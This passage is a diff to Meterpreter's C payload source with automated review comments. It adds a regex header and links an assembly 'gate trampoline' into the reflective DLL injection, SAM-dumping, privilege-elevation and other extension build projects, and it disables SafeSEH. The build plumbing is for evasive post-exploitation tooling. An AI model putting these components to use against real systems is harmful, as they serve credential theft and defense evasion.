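static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t max_match_length, size_t* matchlength)
{
    const size_t start = text_offset;
    /* … unchanged: greedy consumption loop … */
    while (text_offset > start)
    {
        if (matchpattern(pattern, text, text_length, text_offset--, max_match_length, matchlength))
            return 1;
        (*matchlength)--;
    }

    return 0;
}
```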
diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h new file mode 100644 index 000000000..1419df34a --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/re.h 
@@ -0,0 +1,71 @@ +/* + * + * Mini regex-module inspired by Rob Pike's regex code described in: + * + * http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html + * + * + * + * Supports: + * --------- + * '.' Dot, matches any character + * '^' Start anchor, matches beginning of string + * '$' End anchor, matches end of string + * '*' Asterisk, match zero or more (greedy) + * '+' Plus, match one or more (greedy) + * '?' Question, match zero or one (non-greedy) + * '[abc]' Character class, match if one of {'a', 'b', 'c'} + * '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken! + * '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z } + * '\s' Whitespace, \t \f \r \n \v and spaces + * '\S' Non-whitespace + * '\w' Alphanumeric, [a-zA-Z0-9_] + * '\W' Non-alphanumeric + * '\d' Digits, [0-9] + * '\D' Non-digits + * + * + */ + +#ifndef _TINY_REGEX_C +#define _TINY_REGEX_C + +#ifndef RE_DOT_MATCHES_NEWLINE +/* Define to 0 if you DON'T want '.' to match '\r' + '\n' */ +#define RE_DOT_MATCHES_NEWLINE 1 +#endif + +#ifdef __cplusplus +extern "C"{ +#endif + +// size_t for 32-bit compilation. +#include <stddef.h> + +typedef struct regex_t +{ + unsigned char type; /* CHAR, STAR, etc. */ + union + { + unsigned char ch; /* the character itself */ + unsigned char* ccl; /* OR a pointer to characters in class */ + } u; +} regex_t; + +/* Typedef'd pointer to get abstract datatype. */ +typedef struct regex_t* re_t; + +#define MAX_REGEXP_OBJECTS 255 /* Max number of regex symbols in expression. */ +#define MAX_CHAR_CLASS_LEN 255 /* Max length of character-class buffer in. */ + +/* Find matches of the compiled pattern inside text. */ +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t max_match_length, size_t* matchlength); + +/* Compile a regular expression in-place, allowing for multiple needles to be compiled without the usage of a static buffer. 
Returns ERROR_SUCCESS (0) on success, else 1. */ +int re_compile(const char* pattern, size_t pattern_length, re_t compiled_regex, unsigned char* regex_char_buffer); + +#ifdef __cplusplus +} +#endif + +#endif /* ifndef _TINY_REGEX_C */ diff --git a/c/meterpreter/workspace/CMakeLists.txt b/c/meterpreter/workspace/CMakeLists.txt index cdf3207a6..21b9b1d16 100644 --- a/c/meterpreter/workspace/CMakeLists.txt +++ b/c/meterpreter/workspace/CMakeLists.txt @@ -225,6 +225,8 @@ if(BUILD_METSRV) set(MET_SERVERS metsrv) endif() +set(MET_RDI_ASM ReflectiveDLLInjection) + set( MET_DLLS ${MET_SERVERS} @@ -234,6 +236,7 @@ set( set( MET_PROJECTS + ${MET_RDI_ASM} ${MET_LIBS} ${MET_DLLS} ) diff --git a/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt b/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt new file mode 100644 index 000000000..f94f03797 --- /dev/null +++ b/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt @@ -0,0 +1,19 @@ +cmake_minimum_required(VERSION 3.15.7 FATAL_ERROR) + +set(PROJECT_NAME ReflectiveDLLInjection) + +project(${PROJECT_NAME} ASM) + +set(SRC_DIR ../../source/ReflectiveDLLInjection/dll/src) +if("${CMAKE_SYSTEM_PROCESSOR}" MATCHES "(x86_64|amd64)") + set(SRC_FILES ${SRC_DIR}/GateTrampoline64.s) +elseif("${CMAKE_SYSTEM_PROCESSOR}" MATCHES "(i386|i686)") + set(SRC_FILES ${SRC_DIR}/GateTrampoline32.s) +endif() + +set_property(DIRECTORY PROPERTY COMPILE_DEFINITIONS) +set_property(DIRECTORY PROPERTY INCLUDE_DIRECTORIES) +set(CMAKE_ASM_FLAGS_RELEASE_INIT "") +set(CMAKE_ASM_FLAGS_RELEASE "") + +add_library(${PROJECT_NAME} ${SRC_FILES}) diff --git a/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj b/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj index ba50be544..dce0c22b2 100644 --- a/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj +++ b/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj 
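Review bot: In ReflectiveDLLInjection/CMakeLists.txt `SRC_FILES` is only assigned for x86_64/amd64 and i386/i686, so on any other `CMAKE_SYSTEM_PROCESSOR` `add_library(${PROJECT_NAME} ${SRC_FILES})` runs with no sources and the configure step fails with an unrelated message; add `else()` / `message(FATAL_ERROR "Unsupported processor: ${CMAKE_SYSTEM_PROCESSOR}")` before the `endif()`. The `set_property(DIRECTORY PROPERTY COMPILE_DEFINITIONS)` and `INCLUDE_DIRECTORIES` calls and the cleared `CMAKE_ASM_FLAGS_RELEASE*` variables also have no comment explaining why inherited settings are discarded for this target; a line such as `# The gate trampoline is assembled with no inherited flags, definitions or include paths` would make the intent clear.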
@@ -187,16 +187,28 @@ </Lib> </ItemDefinitionGroup> <ItemGroup> + <ClCompile Include="..\..\source\ReflectiveDLLInjection\dll\src\ColdGate.c" /> <ClCompile Include="..\..\source\ReflectiveDLLInjection\inject\src\GetProcAddressR.c" /> <ClCompile Include="..\..\source\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" /> <ClCompile Include="..\..\source\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" /> </ItemGroup> <ItemGroup> + <ClInclude Include="..\..\source\ReflectiveDLLInjection\dll\src\ColdGate.h" /> <ClInclude Include="..\..\source\ReflectiveDLLInjection\inject\src\GetProcAddressR.h" /> <ClInclude Include="..\..\source\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" /> <ClInclude Include="..\..\source\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" /> <ClInclude Include="..\..\source\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> diff --git a/c/meterpreter/workspace/dump_sam/CMakeLists.txt b/c/meterpreter/workspace/dump_sam/CMakeLists.txt index 06842a04a..d69b3ded8 100644 --- a/c/meterpreter/workspace/dump_sam/CMakeLists.txt +++ b/c/meterpreter/workspace/dump_sam/CMakeLists.txt 
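Review bot: The `ExcludedFromBuild` conditions on the two `MASM` items only name the `r7_release` and `Release` configurations, so if this project has any other configuration (a Debug one, say) both GateTrampoline32.asm and GateTrampoline64.asm would be assembled for it on the same platform. A platform-only condition covers every configuration and is shorter: `<ExcludedFromBuild Condition="'$(Platform)'=='x64'">true</ExcludedFromBuild>` on the 32-bit item and `'$(Platform)'=='Win32'` on the 64-bit one. Whether other configurations exist is not visible in this hunk, so treat this as something to confirm against the project's `ProjectConfiguration` list.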
@@ -25,7 +25,7 @@ if(MSVC)
 endif()
 set(LINK_LIBS psapi rpcrt4)
 
-target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
+target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM})
 if(MSVC)
 target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")
 endif()
diff --git a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj
index 15be2cea9..bebb0d00d 100755
--- a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj
+++ b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj
@@ -56,6 +56,7 @@
 </PropertyGroup>
 <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 <ImportGroup Label="ExtensionSettings">
+ <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 </ImportGroup>
 <ImportGroup Label="Shared">
 </ImportGroup>
@@ -112,10 +113,11 @@
 <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
 <BufferSecurityCheck>false</BufferSecurityCheck>
 <FunctionLevelLinking>false</FunctionLevelLinking>
- <CallingConvention>StdCall</CallingConvention>
+ <CallingConvention>Cdecl</CallingConvention>
 <CompileAs>CompileAsC</CompileAs>
 <BasicRuntimeChecks>Default</BasicRuntimeChecks>
 <SupportJustMyCode>false</SupportJustMyCode>
+ <WholeProgramOptimization>false</WholeProgramOptimization>
 </ClCompile>
 <Link>
 <SubSystem>Windows</SubSystem>
@@ -125,6 +127,7 @@
 <RandomizedBaseAddress>false</RandomizedBaseAddress>
 <DataExecutionPrevention>false</DataExecutionPrevention>
 <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
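Review bot: Flipping the project-wide default from StdCall (/Gz) to Cdecl (/Gd) changes the Win32 ABI of every function in dump_sam that has no explicit convention keyword, not just the ones that must match the new gate trampoline; an export listed in dump_sam.def, or a function pointer typedef without WINAPI/__cdecl, that some caller still invokes as stdcall would then leave the stack unbalanced on return. Worth confirming that every function crossing a module or assembly boundary spells its convention explicitly, and recording why the default moved (presumably because GateTrampoline32.asm expects cdecl callers) in a comment beside the property, since a vcxproj gives no other place for that rationale. The same change is made in each configuration of elevator.vcxproj. `<WholeProgramOptimization>false</WholeProgramOptimization>` is likewise unexplained; if LTCG has to stay off so that the code the trampoline references keeps its layout, say so, otherwise a later cleanup is likely to re-enable it.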
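Review bot: `<ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>` emits /SAFESEH:NO, which drops the safe exception handler table from the Win32 image so the loader no longer validates the SEH handlers this DLL registers; that is a hardening regression the hunk does not justify. If the only reason is that the object assembled from GateTrampoline32.asm is not marked SafeSEH-compatible, assembling it with /safeseh (`<UseSafeExceptionHandlers>true</UseSafeExceptionHandlers>` on the MASM item) lets the linker keep the table, and if there is another reason a comment next to the property should state it. The same property is added to ext_server_bofloader, ext_server_extapi and ext_server_incognito as `No` and to elevator and ext_server_espia as `false`; MSBuild accepts both, but one spelling should be used across the tree.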
@@ -146,8 +149,9 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <MultiProcessorCompilation>true</MultiProcessorCompilation> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> + <WholeProgramOptimization>false</WholeProgramOptimization> </ClCompile> <Link> <SubSystem>Windows</SubSystem> @@ -158,6 +162,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <DataExecutionPrevention>false</DataExecutionPrevention> <EntryPointSymbol>DllMain</EntryPointSymbol> <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -181,10 +186,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> <FunctionLevelLinking>false</FunctionLevelLinking> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <BasicRuntimeChecks>Default</BasicRuntimeChecks> <SupportJustMyCode>false</SupportJustMyCode> + <WholeProgramOptimization>false</WholeProgramOptimization> </ClCompile> <Link> <SubSystem>Windows</SubSystem> 
@@ -194,6 +200,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <RandomizedBaseAddress>false</RandomizedBaseAddress> <DataExecutionPrevention>false</DataExecutionPrevention> <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -215,8 +222,9 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <MultiProcessorCompilation>true</MultiProcessorCompilation> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <BufferSecurityCheck>false</BufferSecurityCheck> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> + <WholeProgramOptimization>false</WholeProgramOptimization> </ClCompile> <Link> <SubSystem>Windows</SubSystem> @@ -227,6 +235,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <DataExecutionPrevention>false</DataExecutionPrevention> <EntryPointSymbol>DllMain</EntryPointSymbol> <ModuleDefinitionFile>$(ProjectDir)../../source/dump_sam/dump_sam.def</ModuleDefinitionFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -248,8 +257,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </ItemGroup> <ItemGroup> <None Include="..\..\source\dump_sam\dump_sam.def" /> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <FileType>Document</FileType> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> </Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/elevator/CMakeLists.txt b/c/meterpreter/workspace/elevator/CMakeLists.txt index b7a3afd73..e18964f3f 100644 --- a/c/meterpreter/workspace/elevator/CMakeLists.txt +++ b/c/meterpreter/workspace/elevator/CMakeLists.txt @@ -24,7 +24,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES OUTPUT_NAME ${PROJECT_NAME}.${T set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DIR}/plugin.def\"") set_source_files_properties(${MOD_DEF_DIR}/plugin.def PROPERTIES HEADER_FILE_ONLY TRUE) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/elevator/elevator.vcxproj b/c/meterpreter/workspace/elevator/elevator.vcxproj index d0b5620f4..749cb53ac 100644 --- a/c/meterpreter/workspace/elevator/elevator.vcxproj 
+++ b/c/meterpreter/workspace/elevator/elevator.vcxproj @@ -122,7 +122,7 @@ <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <ShowIncludes>false</ShowIncludes> <TreatWarningAsError>true</TreatWarningAsError> @@ -145,6 +145,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -163,7 +164,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <ShowIncludes>false</ShowIncludes> <TreatWarningAsError>true</TreatWarningAsError> @@ -187,6 +188,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -205,7 +207,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <ShowIncludes>false</ShowIncludes> <TreatWarningAsError>true</TreatWarningAsError> @@ -228,6 +230,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -249,7 +252,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <TreatWarningAsError>true</TreatWarningAsError> <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common</AdditionalIncludeDirectories> 
@@ -288,7 +291,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <TreatWarningAsError>true</TreatWarningAsError> <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common</AdditionalIncludeDirectories> @@ -329,7 +332,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> - <CallingConvention>StdCall</CallingConvention> + <CallingConvention>Cdecl</CallingConvention> <CompileAs>CompileAsC</CompileAs> <TreatWarningAsError>true</TreatWarningAsError> <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common</AdditionalIncludeDirectories> 
@@ -365,6 +368,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\elevator\namedpipeservice.h" /> <ClInclude Include="..\..\source\elevator\tokendup.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <FileType>Document</FileType> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + <PreprocessorDefinitions Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">ASSEMBLE</PreprocessorDefinitions> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -372,4 +389,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt index 702c7f640..fbd48fd03 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt 
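Review bot: The final hunk of elevator.vcxproj replaces `</Project>` with itself minus the trailing newline (`\ No newline at end of file`), which reads as an editor artifact rather than an intended change and will resurface as a spurious diff line in every future edit of the file. The same newline is dropped at the end of ext_server_espia.vcxproj, ext_server_extapi.vcxproj and ext_server_incognito.vcxproj. Restoring the newline, and pinning `insert_final_newline = true` in an .editorconfig if the repository has one, keeps these four hunks out of the commit.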
@@ -39,7 +39,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj index aba733413..7f564180d 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj +++ b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj @@ -37,6 +37,18 @@ <ClCompile Include="..\..\source\extensions\bofloader\bofloader.c" /> <ClCompile Include="..\..\source\logging\logging.c" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <PropertyGroup Label="Globals"> <ProjectGuid>{486B160F-C571-486D-AAC3-CB60CEA7CBDD}</ProjectGuid> <RootNamespace>ext_server_incognito</RootNamespace> 
@@ -170,10 +182,11 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </PostBuildEvent> </ItemDefinitionGroup> @@ -226,10 +239,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)"</Command> </PostBuildEvent> </ItemDefinitionGroup> 
@@ -281,10 +295,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> </PostBuildEvent> </ItemDefinitionGroup> @@ -340,10 +355,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> - <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir 